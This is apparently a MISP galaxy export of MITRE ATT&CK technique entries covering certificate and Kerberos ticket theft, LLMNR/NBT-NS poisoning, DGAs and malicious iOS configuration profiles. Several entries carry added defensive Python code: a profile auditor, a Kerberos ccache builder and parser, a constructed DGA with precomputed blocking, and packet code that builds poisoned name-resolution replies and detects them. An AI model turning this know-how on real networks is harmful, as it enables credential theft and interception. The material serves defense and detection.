This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1359).

An adversary can run their code on systems with cyber security protections, such as antivirus products, in place to see if their code is detected. They can also test their malware on freely available public services. (Citation: MalwareQAZirtest)

The tag is: misp-galaxy:mitre-attack-pattern="Test malware to evade detection - T1359"

Table 5450. Table References

Links

https://attack.mitre.org/techniques/T1359

Replace legitimate binary with malware - T1378

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Replacing a legitimate binary with malware can be accomplished either by replacing a binary on a legitimate download site or standing up a fake or alternative site with the malicious binary. The intent is to have a user download and run the malicious binary thereby executing malware. (Citation: FSecureICS)

The tag is: misp-galaxy:mitre-attack-pattern="Replace legitimate binary with malware - T1378"

Table 5451. Table References

Links

https://attack.mitre.org/techniques/T1378

Compromise of externally facing system - T1388

This technique has been deprecated. Please use [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.

Externally facing systems allow connections from outside the network as a normal course of operations. Externally facing systems may include, but are not limited to, websites, web portals, email, DNS, FTP, VPN concentrators, and border routers and firewalls. These systems could be in a demilitarized zone (DMZ) or may be within other parts of the internal environment. (Citation: CylanceOpCleaver) (Citation: DailyTechAntiSec)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise of externally facing system - T1388"

Table 5452. Table References

Links

https://attack.mitre.org/techniques/T1388

Boot or Logon Initialization Scripts - T1398

Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts are part of the underlying operating system and are not accessible to the user unless the device has been rooted or jailbroken.

The tag is: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1398"

Table 5453. Table References

Links

https://attack.mitre.org/techniques/T1398

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html

https://source.android.com/security/verifiedboot/

Boot or Logon Autostart Execution - T1547

Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.

Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.

The tag is: misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547"

Table 5454. Table References

Links

http://msdn.microsoft.com/en-us/library/aa376977

https://attack.mitre.org/techniques/T1547

https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order

https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx

https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf

Remotely Track Device Without Authorization - T1468

An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google’s Android Device Manager or Apple iCloud’s Find my iPhone) or to an enterprise mobility management (EMM) / mobile device management (MDM) server console could use that access to track mobile devices.(Citation: Krebs-Location)

The tag is: misp-galaxy:mitre-attack-pattern="Remotely Track Device Without Authorization - T1468"

Table 5455. Table References

Links

https://attack.mitre.org/techniques/T1468

https://krebsonsecurity.com/2018/05/tracking-firm-locationsmart-leaked-location-data-for-customers-of-all-major-u-s-mobile-carriers-in-real-time-via-its-web-site/

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html

https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html

Steal or Forge Authentication Certificates - T1649

Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)

Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)

Abusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate’s validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.

Adversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)

The tag is: misp-galaxy:mitre-attack-pattern="Steal or Forge Authentication Certificates - T1649"

Table 5456. Table References

Links

https://attack.mitre.org/techniques/T1649

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh831740(v=ws.11)

https://github.com/GhostPack/SharpDPAPI#certificates

https://github.com/TheWover/CertStealer

https://o365blog.com/post/deviceidentity/

https://posts.specterops.io/certified-pre-owned-d95910965cd2

https://web.archive.org/web/20220818094600/https://specterops.io/assets/resources/Certified_Pre-Owned.pdf

https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming

Remotely Wipe Data Without Authorization - T1469

An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google’s Android Device Manager or Apple iCloud’s Find my iPhone) or to an EMM console could use that access to wipe enrolled devices (Citation: Honan-Hacking).

The tag is: misp-galaxy:mitre-attack-pattern="Remotely Wipe Data Without Authorization - T1469"

Table 5457. Table References

Links

https://attack.mitre.org/techniques/T1469

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html

https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html

https://www.wired.com/2012/08/apple-amazon-mat-honan-hacking/

Install Insecure or Malicious Configuration - T1478

An adversary could attempt to install insecure or malicious configuration settings on the mobile device, through means such as phishing emails or text messages either directly containing the configuration settings as an attachment, or containing a web link to the configuration settings. The device user may be tricked into installing the configuration settings through social engineering techniques (Citation: Symantec-iOSProfile).

For example, an unwanted Certification Authority (CA) certificate could be placed in the device’s trusted certificate store, increasing the device’s susceptibility to adversary-in-the-middle network attacks seeking to eavesdrop on or manipulate the device’s network communication ([Eavesdrop on Insecure Network Communication](https://attack.mitre.org/techniques/T1439) and [Manipulate Device Communication](https://attack.mitre.org/techniques/T1463)).

On iOS, malicious Configuration Profiles could contain unwanted Certification Authority (CA) certificates or other insecure settings such as unwanted proxy server or VPN settings to route the device’s network traffic through an adversary’s system. The device could also potentially be enrolled into a malicious Mobile Device Management (MDM) system (Citation: Talos-MDM).
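A profile delivered by email or a web link can be inspected before anyone taps "Install". The example below is added here and is not MITRE's, MISP's or Apple's code: it parses an unsigned .mobileconfig (an XML property list) with the standard-library plistlib and flags the payload types named above. The payload type identifiers follow Apple's Configuration Profile Reference, but the set chosen, the key used to locate a VPN endpoint, and the sample profile are assumptions made for the example.

```python
import plistlib

# Payload types whose presence in an unsolicited profile deserves scrutiny.
RISKY_PAYLOADS = {
    "com.apple.security.root": "adds a trusted root CA",
    "com.apple.security.pkcs1": "adds a certificate",
    "com.apple.proxy.http.global": "routes HTTP(S) through a global proxy",
    "com.apple.vpn.managed": "routes traffic through a VPN",
    "com.apple.mdm": "enrols the device in an MDM server",
}

def audit_profile(data: bytes) -> dict:
    """Inspect an unsigned .mobileconfig and list its risky payloads."""
    prof = plistlib.loads(data)
    findings = []
    for p in prof.get("PayloadContent", []):
        ptype = p.get("PayloadType", "")
        if ptype not in RISKY_PAYLOADS:
            continue
        if ptype == "com.apple.proxy.http.global":
            target = f"{p.get('ProxyServer')}:{p.get('ProxyServerPort')}"
        elif ptype == "com.apple.mdm":
            target = p.get("ServerURL")
        elif ptype == "com.apple.vpn.managed":
            # Endpoint key depends on the VPN type (assumption: VPN or IPSec dict).
            target = (p.get("VPN") or p.get("IPSec") or {}).get("RemoteAddress")
        else:
            target = p.get("PayloadCertificateFileName") or \
                f"{len(p.get('PayloadContent', b''))} bytes of certificate data"
        findings.append({"type": ptype, "why": RISKY_PAYLOADS[ptype], "target": target})
    return {
        "identifier": prof.get("PayloadIdentifier"),
        "organization": prof.get("PayloadOrganization"),
        # A profile the user cannot remove is itself a warning sign.
        "removal_disallowed": bool(prof.get("PayloadRemovalDisallowed", False)),
        "findings": findings,
    }

# Constructed profile imitating the pattern described above: a root CA, a
# global proxy and an MDM enrolment, with user removal disabled. The
# certificate bytes are a placeholder, not a real DER certificate.
SAMPLE_PROFILE = plistlib.dumps({
    "PayloadType": "Configuration",
    "PayloadVersion": 1,
    "PayloadIdentifier": "com.example.carrier-update",
    "PayloadDisplayName": "Carrier Settings Update",
    "PayloadOrganization": "Example Telecom",
    "PayloadRemovalDisallowed": True,
    "PayloadContent": [
        {"PayloadType": "com.apple.security.root", "PayloadVersion": 1,
         "PayloadIdentifier": "com.example.carrier-update.ca",
         "PayloadCertificateFileName": "carrier-root.cer",
         "PayloadContent": b"\x30\x82\x00\x00"},
        {"PayloadType": "com.apple.proxy.http.global", "PayloadVersion": 1,
         "PayloadIdentifier": "com.example.carrier-update.proxy",
         "ProxyType": "Manual", "ProxyServer": "proxy.example.net",
         "ProxyServerPort": 8080},
        {"PayloadType": "com.apple.mdm", "PayloadVersion": 1,
         "PayloadIdentifier": "com.example.carrier-update.mdm",
         "ServerURL": "https://mdm.example.net/devices",
         "Topic": "com.apple.mgmt.example"},
        {"PayloadType": "com.apple.wifi.managed", "PayloadVersion": 1,
         "PayloadIdentifier": "com.example.carrier-update.wifi",
         "SSID_STR": "Guest"},
    ],
})
```

Profiles that are CMS-signed are DER-wrapped and will not load as a plist; unwrap them first (for example with openssl's smime -verify -noverify, using -inform der) and audit the extracted plist. A valid signature says who signed the profile, not that its payloads are benign.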

The tag is: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478"

Table 5458. Table References

Links

https://attack.mitre.org/techniques/T1478

https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM.html

https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-7.html

https://www.symantec.com/connect/blogs/malicious-profiles-sleeping-giant-ios-security

Steal or Forge Kerberos Tickets - T1558

Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.

On Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)

Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user’s session lasts.(Citation: MIT ccache) On modern Red Hat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)

Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller’s environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple’s native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user’s TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
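What a stolen ccache gives an adversary, and what an analyst should look for in one found on a compromised host, becomes concrete once the file layout is visible. The example below is added here and is not MITRE's, MISP's or the MIT Kerberos project's code: it serialises and parses the version-4 FILE ccache layout as documented by MIT krb5 (big-endian fields, counted octet strings, a header of tagged fields, a default principal, then one credential record per ticket). The realm, principals, timestamps and session keys are constructed, and the ticket bytes are opaque placeholders rather than real ASN.1 tickets; check the parser against a real ccache written by kinit before relying on it.

```python
import struct

KRB5_NT_PRINCIPAL = 1           # name-type for user and service principals
ETYPE_AES256_SHA1 = 18          # aes256-cts-hmac-sha1-96

def _cstr(b: bytes) -> bytes:
    """Counted octet string: 32-bit length followed by the bytes."""
    return struct.pack(">I", len(b)) + b

def _principal(realm: str, *components: str) -> bytes:
    out = struct.pack(">II", KRB5_NT_PRINCIPAL, len(components)) + _cstr(realm.encode())
    return out + b"".join(_cstr(c.encode()) for c in components)

def build_ccache(realm, client, creds, now):
    """Version-4 FILE ccache with one record per (service, session_key,
    lifetime_seconds) tuple; ticket bodies are opaque placeholders."""
    header = struct.pack(">HH", 1, 8) + struct.pack(">ii", 0, 0)  # tag 1: DeltaTime
    out = b"\x05\x04" + struct.pack(">H", len(header)) + header
    out += _principal(realm, client)                               # default principal
    for service, session_key, lifetime in creds:
        out += _principal(realm, client) + _principal(realm, *service)
        out += struct.pack(">H", ETYPE_AES256_SHA1) + _cstr(session_key)   # keyblock
        out += struct.pack(">IIII", now, now, now + lifetime, now + 7 * 86400)
        out += b"\x00"                                   # is_skey
        out += struct.pack(">I", 0x40E00000)             # forwardable, renewable, initial, pre-authent
        out += struct.pack(">I", 0)                      # no addresses
        out += struct.pack(">I", 0)                      # no authorization data
        out += _cstr(b"\x61" + bytes(31))                # placeholder ticket
        out += _cstr(b"")                                # second_ticket
    return out

class _Reader:
    def __init__(self, data: bytes):
        self.d, self.p = data, 0
    def take(self, n: int) -> bytes:
        b = self.d[self.p:self.p + n]
        if len(b) != n:
            raise ValueError("truncated ccache")
        self.p += n
        return b
    def u8(self): return self.take(1)[0]
    def u16(self): return struct.unpack(">H", self.take(2))[0]
    def u32(self): return struct.unpack(">I", self.take(4))[0]
    def cstr(self): return self.take(self.u32())
    def principal(self) -> str:
        _ntype, n = self.u32(), self.u32()
        realm = self.cstr().decode()
        return "/".join(self.cstr().decode() for _ in range(n)) + "@" + realm
    def eof(self): return self.p >= len(self.d)

def parse_ccache(data: bytes):
    """Return (default_principal, [credential dicts]) from a v4 ccache."""
    r = _Reader(data)
    if r.take(2) != b"\x05\x04":
        raise ValueError("only ccache format version 4 is handled here")
    r.take(r.u16())                                      # skip header tags
    default = r.principal()
    creds = []
    while not r.eof():
        client, server = r.principal(), r.principal()
        etype, key = r.u16(), r.cstr()
        authtime, starttime, endtime, renew_till = (r.u32() for _ in range(4))
        r.u8()                                           # is_skey
        flags = r.u32()
        for _ in range(r.u32()):                         # addresses
            r.u16(); r.cstr()
        for _ in range(r.u32()):                         # authorization data
            r.u16(); r.cstr()
        ticket, _second = r.cstr(), r.cstr()
        creds.append({"client": client, "server": server, "etype": etype,
                      "key_len": len(key), "starttime": starttime,
                      "endtime": endtime, "renew_till": renew_till,
                      "flags": flags, "ticket_len": len(ticket)})
    return default, creds

def usable_tickets(data: bytes, now: int):
    """Service principals whose ticket has not expired at `now`."""
    _default, creds = parse_ccache(data)
    return [c["server"] for c in creds if c["endtime"] > now]

NOW = 1_700_000_000     # constructed clock for the sample cache
SAMPLE_CCACHE = build_ccache("CORP.EXAMPLE", "alice", [
    (("krbtgt", "CORP.EXAMPLE"), bytes(32), 10 * 3600),       # the TGT
    (("cifs", "fs01.corp.example"), bytes(32), 600),          # short-lived service ticket
], NOW)
```

The record layout is the same whether the file came from /tmp/krb5cc_1000, from a blob pulled out of SSSD's secrets.ldb, or from a macOS KCM dump written back to disk, which is why tools can convert between these sources and Windows .kirbi files. Note that every record carries the session key in the clear: possession of the file, not the password, is enough to use the ticket until endtime.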

The tag is: misp-galaxy:mitre-attack-pattern="Steal or Forge Kerberos Tickets - T1558"

Table 5459. Table References

Links

http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html

https://adsecurity.org/?p=1515

https://adsecurity.org/?p=227

https://adsecurity.org/?p=2293

https://attack.mitre.org/techniques/T1558

https://blog.stealthbits.com/detect-pass-the-ticket-attacks

https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/

https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf

https://docs.microsoft.com/windows-server/administration/windows-commands/klist

https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285

https://github.com/gentilkiwi/kekeo

https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf

https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea

https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f

https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html

https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html

Aggregate individual’s digital footprint - T1275

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1275).

Beyond a target’s social media presence there may exist a larger digital footprint, such as accounts and credentials on e-commerce sites or usernames and logins for email. An adversary who knows a target’s username can mine publicly available sources to map the target’s wider digital footprint. (Citation: DigitalFootprint) (Citation: trendmicro-vtech)

The tag is: misp-galaxy:mitre-attack-pattern="Aggregate individual’s digital footprint - T1275"

Table 5460. Table References

Links

https://attack.mitre.org/techniques/T1275

Domain Generation Algorithms (DGA) - T1323

This technique has been deprecated. Please use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1568/002).

The use of algorithms in malware to periodically generate a large number of domain names which function as rendezvous points for malware command and control servers. (Citation: DamballaDGA) (Citation: DambballaDGACyberCriminals)
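The defensive consequence of a DGA is that, once the algorithm and its seed are recovered from a sample, every rendezvous domain the implant will try over a window can be generated ahead of time and blocked, sinkholed or pre-registered. The example below is added here and is not MITRE's or MISP's code, nor a real malware family's algorithm: it is a constructed date-seeded DGA together with the defender-side precomputation and lookup that such a recovery enables. The secret, TLD list and dates are assumptions for the example.

```python
import hashlib
from datetime import date, timedelta

# Constructed seed-based DGA for illustration. Implant and operator both
# derive the same daily list from the date and a shared secret, so the
# operator only has to register one of the candidates.
SECRET = b"example-seed"
TLDS = ("com", "net", "org")

def dga(day: date, count: int = 10, secret: bytes = SECRET):
    """Deterministic candidate rendezvous domains for one day."""
    seed = day.strftime("%Y%m%d").encode() + secret
    domains = []
    for i in range(count):
        digest = hashlib.sha256(seed + i.to_bytes(2, "big")).digest()
        label = "".join(chr(ord("a") + b % 26) for b in digest[:12])
        domains.append(f"{label}.{TLDS[digest[12] % len(TLDS)]}")
    return domains

def precompute(start: date, days: int, **kw):
    """Defender side: map every domain the implant will try over a window
    to the day it becomes active."""
    out = {}
    for n in range(days):
        d = start + timedelta(days=n)
        for dom in dga(d, **kw):
            out[dom] = d.isoformat()
    return out

def matches_dga(domain: str, blocklist: dict):
    """Return the activation date if a queried domain is on the precomputed
    list, else None (for use over DNS query logs)."""
    return blocklist.get(domain.lower().rstrip("."))
```

Real families vary the details (the seed may come from a trending-topic feed or an exchange rate rather than the date, the list may be regenerated hourly, and the implant may try hundreds of candidates), but the precomputation step is the same: NXDOMAIN bursts against names from the generated set, followed by one that resolves, are the observable in DNS logs.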

The tag is: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms (DGA) - T1323"

Table 5461. Table References

Links

https://attack.mitre.org/techniques/T1323

Unconditional client-side exploitation/Injected Website/Driveby - T1372

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

A technique used to compromise victims wherein the victims visit a compromised website that redirects their browser to a malicious web site, such as an exploit kit’s landing page. The exploit kit landing page will probe the victim’s operating system, web browser, or other software to find an exploitable vulnerability to infect the victim. (Citation: GeorgeDriveBy) (Citation: BellDriveBy)

The tag is: misp-galaxy:mitre-attack-pattern="Unconditional client-side exploitation/Injected Website/Driveby - T1372"

Table 5462. Table References

Links

https://attack.mitre.org/techniques/T1372

LLMNR/NBT-NS Poisoning and Relay - T1171

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)

Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 challenge-response (often called the Net-NTLMv2 "hash"; it is not the NT hash and cannot be passed, only cracked or relayed) will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)

Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)
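Both protocols reuse the DNS message layout, which is what makes a poisoner easy to spot from the defender's side: a host that answers a query for a name that exists nowhere (a canary the defender deliberately asks for, as Conveigh does) has given itself away. The example below is added here and is not MITRE's, MISP's or any listed tool's code: it encodes and parses LLMNR and NBT-NS messages, including the NetBIOS first-level name encoding and RFC 1035 compression pointers, and applies the canary rule to a constructed packet capture. Source addresses, names and transaction IDs are assumptions for the example; the LLMNR response echoes the question and the NBT-NS positive response carries no question section, matching what the two protocols put on the wire.

```python
import struct

A_RECORD, NB_RECORD = 1, 0x20

def encode_dns_name(name: str) -> bytes:
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"

def encode_nbns_name(name: str, suffix: int = 0x20) -> bytes:
    """NetBIOS first-level encoding: 15 chars + suffix byte, each nibble
    mapped to a letter A..P, carried as one 32-character label."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    enc = "".join(chr(0x41 + (b >> 4)) + chr(0x41 + (b & 0x0F)) for b in raw)
    return bytes([32]) + enc.encode("ascii") + b"\x00"

def decode_nbns_label(label: str) -> str:
    if len(label) != 32 or any(c not in "ABCDEFGHIJKLMNOP" for c in label):
        return label
    raw = bytes(((ord(label[i]) - 0x41) << 4) | (ord(label[i + 1]) - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip()

def read_name(pkt: bytes, off: int):
    """Read a DNS-format name, following compression pointers."""
    labels, end = [], None
    while True:
        n = pkt[off]
        if n & 0xC0 == 0xC0:
            if end is None:
                end = off + 2
            off = struct.unpack(">H", pkt[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if n == 0:
            break
        labels.append(pkt[off:off + n].decode("ascii", "replace"))
        off += n
    return ".".join(labels), (end if end is not None else off)

def _normalize(name: str, proto: str) -> str:
    first = name.split(".")[0]
    return (decode_nbns_label(first) if proto == "nbns" else first).lower()

def parse_message(pkt: bytes, proto: str) -> dict:
    """Parse an LLMNR or NBT-NS message (both use the DNS header layout)."""
    tid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = read_name(pkt, off)
        qtype, _qclass = struct.unpack(">HH", pkt[off:off + 4]); off += 4
        questions.append((_normalize(name, proto), qtype))
    for _ in range(an):
        name, off = read_name(pkt, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10]); off += 10
        rdata = pkt[off:off + rdlen]; off += rdlen
        if proto == "nbns" and rtype == NB_RECORD and rdlen >= 6:
            addr = ".".join(map(str, rdata[2:6]))        # NB rdata: flags(2) + IPv4
        elif rtype == A_RECORD and rdlen == 4:
            addr = ".".join(map(str, rdata))
        else:
            addr = rdata.hex()
        answers.append((_normalize(name, proto), addr))
    return {"id": tid, "response": bool(flags & 0x8000),
            "questions": questions, "answers": answers}

def build_response(proto: str, name: str, ip: str, tid: int = 0x1234) -> bytes:
    """Constructed positive answer of the kind a poisoner sends."""
    ip_b = bytes(int(x) for x in ip.split("."))
    if proto == "llmnr":        # question echoed; answer name points back to it
        q = encode_dns_name(name) + struct.pack(">HH", A_RECORD, 1)
        a = b"\xC0\x0C" + struct.pack(">HHIH", A_RECORD, 1, 30, 4) + ip_b
        return struct.pack(">HHHHHH", tid, 0x8000, 1, 1, 0, 0) + q + a
    a = encode_nbns_name(name) + struct.pack(">HHIH", NB_RECORD, 1, 165, 6) + b"\x00\x00" + ip_b
    return struct.pack(">HHHHHH", tid, 0x8500, 0, 1, 0, 0) + a

def find_poisoners(packets, canaries):
    """packets: (proto, src_ip, raw). Any response naming a canary, a name
    the defender queried and that exists nowhere, identifies a poisoner."""
    hits = {}
    for proto, src, raw in packets:
        msg = parse_message(raw, proto)
        for name, _addr in msg["answers"] if msg["response"] else []:
            if name in canaries:
                hits.setdefault(src, set()).add(name)
    return hits

CANARIES = {"fileshare01", "wpad-canary"}
SAMPLE_PACKETS = [   # constructed capture: one query, two poisoned answers, one legitimate answer
    ("llmnr", "10.0.0.25", struct.pack(">HHHHHH", 0x1234, 0, 1, 0, 0, 0)
     + encode_dns_name("fileshare01") + struct.pack(">HH", A_RECORD, 1)),
    ("llmnr", "10.0.0.66", build_response("llmnr", "fileshare01", "10.0.0.66")),
    ("nbns", "10.0.0.66", build_response("nbns", "wpad-canary", "10.0.0.66")),
    ("llmnr", "10.0.0.30", build_response("llmnr", "printer7", "10.0.0.30")),
]
```

In production the packets come from a capture on UDP 5355 and 137, the canary names are random and rotated, and the remediation is to disable LLMNR and NetBIOS over TCP/IP by policy, at which point any remaining traffic on those ports is itself an alert.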

The tag is: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and Relay - T1171"

Table 5463. Table References

Links

https://attack.mitre.org/techniques/T1171

https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution

https://github.com/Kevin-Robertson/Conveigh

https://github.com/SpiderLabs/Responder

https://github.com/nomex/nbnspoof

https://technet.microsoft.com/library/cc958811.aspx

https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response

https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning

OS-vendor provided communication channels - T1390

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1390).

Google and Apple provide Google Cloud Messaging and Apple Push Notification Service, respectively, services designed to enable efficient communication between third-party mobile app backend servers and the mobile apps running on individual devices. These services maintain an encrypted connection between every mobile device and Google or Apple that cannot easily be inspected and must be allowed to traverse networks as part of normal device operation. These services could be used by adversaries for communication to compromised mobile devices. (Citation: Securelist Mobile Malware 2013) (Citation: DroydSeuss)

